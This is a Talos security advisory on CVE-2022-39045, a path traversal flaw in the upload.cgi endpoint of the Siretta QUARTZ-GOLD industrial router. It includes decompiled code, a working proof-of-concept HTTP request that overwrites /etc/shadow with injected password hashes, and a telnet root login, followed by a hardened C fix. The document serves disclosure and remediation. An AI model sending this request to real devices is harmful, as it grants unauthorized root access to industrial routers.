# Talos Vulnerability Report
### TALOS-2022-1611
## Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability
##### January 26, 2023
##### CVE Number
CVE-2022-39045
##### SUMMARY
A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
##### CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
##### PRODUCT URLS
QUARTZ-GOLD –
##### CVSSv3 SCORE
7.2 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
##### CWE
CWE-22 – Improper Limitation of a Pathname to a Restricted Directory (“Path Traversal”)
##### DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which relate to the management of external files: the web server offers an API for uploading files, downloading them, and deleting them when they are no longer required.
The endpoint `upload.cgi` allows a file to be uploaded. The following is one of the functions responsible for this API:
```c
void input_upload.cgi(char *path, int len, char *boundary)
{
    […]
    remaining_length_to_write = len;
    storage_udisk = nvram_get_int("storage_udisk");
    [… calculate base_folder and perform basic checks …]
    else {
        […]
        filename_param = (char *)webcgi_safeget("filename");   /* [1] */
        filename = "";
        if (filename_param != (char *)0x0) {
            filename = filename_param;
        }
        sprintf(buff, "%s/%s", base_folder, filename);          /* [2] */
        fd = fopen(buff, "w");                                  /* [3] */
        if (fd == (FILE *)0x0) {
            base_folder = "Unable to start pipe for mtd write";
        }
        else {
            […]
            boundary_len = strlen(boundary);
            remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
            while (0
```

```http
&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884

--906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name="content"; filename="content"

root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
--906881afb7fae201f7f9962a229f9884--
```
If the request was successful, it is now possible to access the device using `root:admin` as credentials. For instance, connecting with telnet to port 2323, we can log in with the injected credentials:
```
❯ telnet 192.168.0.1 2323
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
QUARTZ-GOLD login: root
Password:
root@QUARTZ-GOLD:/tmp/home/root#
```
Effectively allowing arbitrary command execution.
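The root cause is the `sprintf(buff, "%s/%s", base_folder, filename)` join at [2]: the client-controlled `filename` is appended to the storage folder without being checked for path separators or `..` components, so the `fopen` at [3] can be pointed at any path the process can write. The following is an added illustration of the weak pattern beside a hardened replacement; it is not code from the QUARTZ-GOLD firmware, and the function names, the `/tmp/storage` base folder and the percent-decoding step (included to make the point that validation must run on the decoded value) are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration, not code from the QUARTZ-GOLD firmware. Function and
 * path names are hypothetical; "/tmp/storage" stands in for the base_folder
 * the CGI computes. */

#define UPLOAD_NAME_MAX 128

/* Decode %XX escapes (the form the filename arrives in on the wire). Returns
 * the decoded length, or -1 if the output would not fit or an escape is
 * malformed. Validation below runs on this decoded value, never the raw one. */
int percent_decode(char *dst, size_t dstlen, const char *src)
{
    size_t o = 0;
    for (const char *p = src; *p != '\0'; p++) {
        if (o + 1 >= dstlen)
            return -1;
        if (*p == '%') {
            if (!isxdigit((unsigned char)p[1]) || !isxdigit((unsigned char)p[2]))
                return -1;
            char hex[3] = { p[1], p[2], '\0' };
            dst[o++] = (char)strtol(hex, NULL, 16);
            p += 2;
        } else {
            dst[o++] = *p;
        }
    }
    dst[o] = '\0';
    return (int)o;
}

/* Same shape as the advisory's sprintf(buff, "%s/%s", base_folder, filename):
 * whatever the client sent is joined onto the storage folder unchanged, so
 * "../" components escape it. Kept here only as the reference point. */
int build_path_unsafe(char *out, size_t outlen, const char *base_folder,
                      const char *filename)
{
    int n = snprintf(out, outlen, "%s/%s", base_folder, filename);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Accept only a single bare path component: non-empty, bounded in length,
 * not "." or "..", and free of '/', '\\' and control characters. A name that
 * passes cannot change directory, so the join below stays inside base_folder. */
int validate_upload_filename(const char *filename)
{
    if (filename == NULL || filename[0] == '\0')
        return 0;
    if (strlen(filename) > UPLOAD_NAME_MAX)
        return 0;
    if (strcmp(filename, ".") == 0 || strcmp(filename, "..") == 0)
        return 0;
    for (const unsigned char *p = (const unsigned char *)filename; *p; p++) {
        if (*p == '/' || *p == '\\' || *p < 0x20 || *p == 0x7f)
            return 0;
    }
    return 1;
}

/* Hardened replacement: decode, validate, then join with a bounded snprintf.
 * Returns 0 and fills `out` on success, -1 if the name is rejected. */
int build_path_safe(char *out, size_t outlen, const char *base_folder,
                    const char *raw_filename)
{
    char decoded[UPLOAD_NAME_MAX + 1];
    if (percent_decode(decoded, sizeof decoded, raw_filename) < 0)
        return -1;
    if (!validate_upload_filename(decoded))
        return -1;
    int n = snprintf(out, outlen, "%s/%s", base_folder, decoded);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    /* Constructed inputs: a benign name and the advisory's traversal string. */
    const char *names[] = { "config.bin", "..%2F..%2F..%2Fetc%2Fshadow" };
    char path[256];
    for (size_t i = 0; i < 2; i++) {
        if (build_path_safe(path, sizeof path, "/tmp/storage", names[i]) == 0)
            printf("accepted: %s -> %s\n", names[i], path);
        else
            printf("rejected: %s\n", names[i]);
    }
    return 0;
}
```

The check is an allow-list of a single path component rather than a deny-list of `..`, which is what makes it robust: any name it accepts cannot contain a separator, so no sequence of components can leave `base_folder`. The bounded `snprintf` also removes the unbounded `sprintf` into `buff`. As defence in depth, the eventual open should use `O_NOFOLLOW` (or check that the resolved directory is still `base_folder`) so that a symlink already present in the storage folder cannot redirect the write.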
##### TIMELINE
2022-10-14 – Initial Vendor Contact
2022-10-20 – Vendor Disclosure
2022-11-24 – Vendor Patch Release
2023-01-26 – Public Release
##### Credit
Discovered by Francesco Benvenuto of Cisco Talos.